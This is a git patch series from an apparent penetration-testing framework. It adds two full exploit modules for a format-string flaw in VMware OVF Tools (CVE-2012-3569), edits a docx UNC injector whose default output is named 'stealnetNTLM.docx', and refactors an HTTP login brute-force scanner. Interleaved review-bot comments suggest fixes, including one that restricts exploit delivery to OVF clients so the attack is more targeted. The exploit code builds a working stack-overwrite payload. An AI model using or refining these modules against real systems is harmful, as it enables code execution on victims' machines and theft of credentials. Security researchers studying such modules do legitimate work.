@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" 
typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr 
val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr 
val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml deleted file mode 100644 index b4a16977f713..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file From fa1811ac38ab93a3a46039acedfcdec3fd81750b Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 15:25:11 +0100 Subject: [PATCH 262/421] changed SOURCE to be OptPath --- modules/auxiliary/docx/word_unc_injector.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index ccf94a838f6e..66c5325d38cb 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -38,7 +38,7 @@ def initialize(info = {}) register_options( [ OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), - OptString.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), + OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), ], self.class) From 135718a97b9c0242f5f2c615090507b3498e5209 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:36:33 +0100 Subject: [PATCH 263/421] Added module for cve-2012-3569, fileformat version --- .../windows/fileformat/ovf_format_string.rb | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 modules/exploits/windows/fileformat/ovf_format_string.rb diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb new file mode 100644 index 000000000000..cbd21fed2aae --- /dev/null +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb 
@@ -0,0 +1,119 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VMWare OVF Tools Format String Vulnerability', + 'Description' => %q{ + This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for + Windows. The vulnerability occurs when printing error messages while parsing a + a malformed OVF file. The module has been tested successfully with VMWare OVF Tools + 2.1 on Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'juan vazquez' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2012-3569' ], + [ 'OSVDB', '87117' ], + [ 'BID', '56468' ], + [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => + (0x00..0x08).to_a.pack("C*") + + "\x0b\x0c\x0e\x0f" + + (0x10..0x1f).to_a.pack("C*") + + (0x80..0xff).to_a.pack("C*") + + "\x22", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x54\x59", # push esp # pop ecx + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + 'BufferOffset' => 6 + } + }, + 'Platform' => 'win', + 'Targets' => + [ + # vmware-ovftool-2.1.0-467744-win-i386.msi + [ 'VMWare OVF Tools 2.1 on Windows XP SP3', + { + 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 + 'AddrPops' => 98, + 'StackPadding' => 38081, + 'Alignment' => 4096 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 08 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']), + ], self.class) + end + 
+ def ovf + my_payload = rand_text_alpha(4) # ebp + my_payload << [target.ret].pack("V") # eip # call esp + my_payload << payload.encoded + + fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) + fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 + fs << my_payload + # 65536 => 0x10000 + # 27 => Error message prefix length + fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) + fs << "%08x" * target['AddrPops'] # Reach saved EBP + fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 + + ovf_file = <<-EOF +<?xml version="1.0" encoding="UTF-8"?> +<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" +xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" +xmlns:vmw="http://www.vmware.com/schema/ovf" +xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <References> + <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> + </References> + <DiskSection> + <Info>Virtual disk information</Info> + <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> + </DiskSection> + <VirtualSystem ovf:id="Small VM"> + <Info>A virtual machine</Info> + </VirtualSystem> +</Envelope> + EOF + ovf_file + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1") + file_create(ovf) + end +end From e0d4bb57990db69576719389753adf4d24690404 Mon Sep 17 00:00:00 2001 
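Review bot: The status message in `exploit` at the end of this new file has two typos ("This files", "VMMWare"), and the `Description` repeats a word ("parsing a a malformed OVF file"). Both are user-facing strings and worth fixing before merge. Suggested line, spelled to match the module's own `Name`: `print_status("Creating '#{datastore['FILENAME']}'. This file should be opened with VMWare OVF Tools 2.1")`. The `ovf` method and the `Payload` and `Targets` blocks are also repeated verbatim in modules/exploits/windows/browser/ovftool_format_string.rb, added by the next patch, so a shared mixin would keep the two copies from drifting apart.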
From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:37:42 +0100 Subject: [PATCH 264/421] Added module for cve-2012-3569, browser version --- .../windows/browser/ovftool_format_string.rb | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 modules/exploits/windows/browser/ovftool_format_string.rb diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb new file mode 100644 index 000000000000..d15d81b06c4c --- /dev/null +++ b/modules/exploits/windows/browser/ovftool_format_string.rb 
@@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info={}) + super(update_info(info, + 'Name' => 'VMWare OVF Tools Format String Vulnerability', + 'Description' => %q{ + This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for + Windows. The vulnerability occurs when printing error messages while parsing a + a malformed OVF file. The module has been tested successfully with VMWare OVF Tools + 2.1 on Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'juan vazquez' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2012-3569' ], + [ 'OSVDB', '87117' ], + [ 'BID', '56468' ], + [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => + (0x00..0x08).to_a.pack("C*") + + "\x0b\x0c\x0e\x0f" + + (0x10..0x1f).to_a.pack("C*") + + (0x80..0xff).to_a.pack("C*") + + "\x22", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x54\x59", # push esp # pop ecx + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + 'BufferOffset' => 6 + } + }, + 'Platform' => 'win', + 'Targets' => + [ + # vmware-ovftool-2.1.0-467744-win-i386.msi + [ 'VMWare OVF Tools 2.1 on Windows XP SP3', + { + 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 + 'AddrPops' => 98, + 'StackPadding' => 38081, + 'Alignment' => 4096 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 08 2012', + 'DefaultTarget' => 0)) + + end + + def ovf + my_payload = rand_text_alpha(4) # ebp + my_payload << 
[target.ret].pack("V") # eip # call esp + my_payload << payload.encoded + + fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) + fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 + fs << my_payload + # 65536 => 0x10000 + # 27 => Error message prefix length + fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) + fs << "%08x" * target['AddrPops'] # Reach saved EBP + fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 + + ovf_file = <<-EOF +<?xml version="1.0" encoding="UTF-8"?> +<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" +xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" +xmlns:vmw="http://www.vmware.com/schema/ovf" +xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <References> + <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> + </References> + <DiskSection> + <Info>Virtual disk information</Info> + <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> + </DiskSection> + <VirtualSystem ovf:id="Small VM"> + <Info>A virtual machine</Info> + </VirtualSystem> +</Envelope> + EOF + ovf_file + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + + if agent !~ /VMware-client/ or agent !~ /ovfTool/ + print_status("User agent #{agent} not recognized, answering Not Found...") + send_not_found(cli) + end + + if uri =~ /.mf$/ + # The manifest file isn't required + print_status("Sending Not Found for Manifest file request...") + 
send_not_found(cli) + end + + print_status("Sending OVF exploit...") + send_response(cli, ovf, {'Content-Type'=>'text/xml'}) + end + +end \ No newline at end of file From 9ce5f39bc6afae2352c04edcc7d3626327743831 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:42:56 +0100 Subject: [PATCH 265/421] added migrate as initial script --- modules/exploits/windows/browser/ovftool_format_string.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index d15d81b06c4c..fa3681ff88f2 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -51,6 +51,10 @@ def initialize(info={}) 'BufferOffset' => 6 } }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, 'Platform' => 'win', 'Targets' => [ From 2c3de43f4b8c0e4d037feb3a51907a13228932bb Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:10:44 -0600 Subject: [PATCH 266/421] datastore opts cleanup cleanuo digestauth datastore options in modules --- modules/auxiliary/gather/shodan_search.rb | 4 ++-- modules/auxiliary/server/http_ntlmrelay.rb | 3 +-- .../exploits/windows/http/xampp_webdav_upload_php.rb | 10 ++++------ 3 files changed, 7 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 8b114dbdd874..6f63b7b95d0d 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb 
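Review bot: In `on_request_uri`, neither guard returns after `send_not_found(cli)`, so a request with an unrecognized User-Agent, or one for the manifest, still continues to `send_response(cli, ovf, {'Content-Type'=>'text/xml'})`. The generated document is therefore handed to every client that connects, not only the ones the checks were meant to select. Add `return` on the line after each `send_not_found(cli)`. The manifest test `uri =~ /.mf$/` also has an unescaped dot and so matches any URI ending in "mf"; `/\.mf\z/` states the intent.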
@@ -38,10 +38,10 @@ def initialize(info = {}) )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2', 'SSL') register_options( [ diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c47f..080803918b83 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,8 +84,7 @@ def initialize(info = {}) 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8e9..c4d36a61f1fc 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb 
@@ -36,8 +36,8 @@ def initialize [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,10 @@ def initialize def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', - 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'data' => payload.raw }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" From 9497e38ef755089d9a678d25054375b323a6fb84 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:31:19 -0600 Subject: [PATCH 267/421] Fix http login scanner Fix the http_login scanner to use new buitin auth --- lib/msf/core/exploit/http/client.rb | 48 +---- lib/rex/proto/http/client.rb | 2 + modules/auxiliary/scanner/http/http_login.rb | 183 +++---------------- 3 files changed, 29 insertions(+), 204 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 808646a8435b..293a4acd4cc0 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
@@ -274,6 +274,10 @@ def send_request_raw(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -289,50 +293,6 @@ def basic_auth datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end - # - # Authenticates to the remote host based on the most appropriate authentication method, - # and returns the HTTP response. If there are multiple auth methods supported, then it - # will pick one in the following order: Basic, Digest, Negotiate, and then NTLM. - # - # Options: - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_smart_auth(opts={}, timeout=20) - res = send_request_cgi(opts,timeout) - return nil if res.nil? - return res unless res.code == 401 - return res if opts['username'].blank? - return res unless res.headers['WWW-Authenticate'] - - if res.headers['WWW-Authenticate'].include? "Basic" - opts['password']||= '' - opts['basic_auth'] = opts['username'] + ":" + opts['password'] - res = send_request_cgi(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "Digest" - opts['DigestAuthUser'] = opts['username'] - opts['DigestAuthPassword'] = opts['password'] - res = send_digest_request_cgi(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "Negotiate" - opts['provider'] = 'Negotiate' - res = send_request_auth_negotiate(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "NTLM" - opts['provider'] = 'NTLM' - res = send_request_auth_negotiate(opts,timeout) - return res - - end - - return nil - end - - ## # # Wrappers for getters 
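Review bot: In `send_request_cgi` the added lines copy `opts['username']` and `opts['password']` onto the client returned by `connect(opts)`, but nothing clears them, and the assignment is skipped when no username is passed. If `connect` returns a client that is reused across calls (not visible in this hunk), credentials from one request would be carried into later requests that did not ask for authentication. That is worth confirming, or `c.username`/`c.password` could be reset when the option is absent. The following hunk removes the public `send_request_smart_auth`, so any module outside this diff that still calls it will fail at runtime; a grep for remaining callers should accompany the removal.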
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 8c32ed3c2baf..725f451b4253 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -581,6 +581,8 @@ def negotiate_auth(opts={}) } to = opts['timeout'] || 20 + opts['username'] ||= self.username.to_s + opts['password'] ||= self.password.to_s if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 570ed26c28a4..fcf69e28e0a2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -48,9 +48,7 @@ def initialize register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme - - path_and_scheme = [] + def find_auth_uri if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +78,9 @@ def find_auth_uri_and_scheme next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme end def target_url @@ -111,7 +97,7 @@ def run_host(ip) print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri() if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return 
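Review bot: `find_auth_uri` in http_login.rb now returns the first path that produces any response, because the removed `next if not res.code == 401` and `next if not res.headers['WWW-Authenticate']` checks were not replaced. A path that answers 200 without authentication will then make the first credential pair tried look like a successful login, which only the later random-credential probe relabels. The "No URI found that asks for HTTP authentication" error in `run_host` also no longer describes what was tested. Keeping `next unless res.code == 401 and res.headers['WWW-Authenticate']` ahead of `return path` preserves the old precondition without bringing back scheme detection. The loop this sits in starts outside the hunk.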
@@ -119,12 +105,7 @@ def run_host(ip) @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) @@ -133,27 +114,23 @@ def run_host(ip) def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - if success + response = do_http_login(user,pass) + result = determine_result(response) + + return :abort if result == :abort + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ def do_login(user='admin', pass='admin') :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", 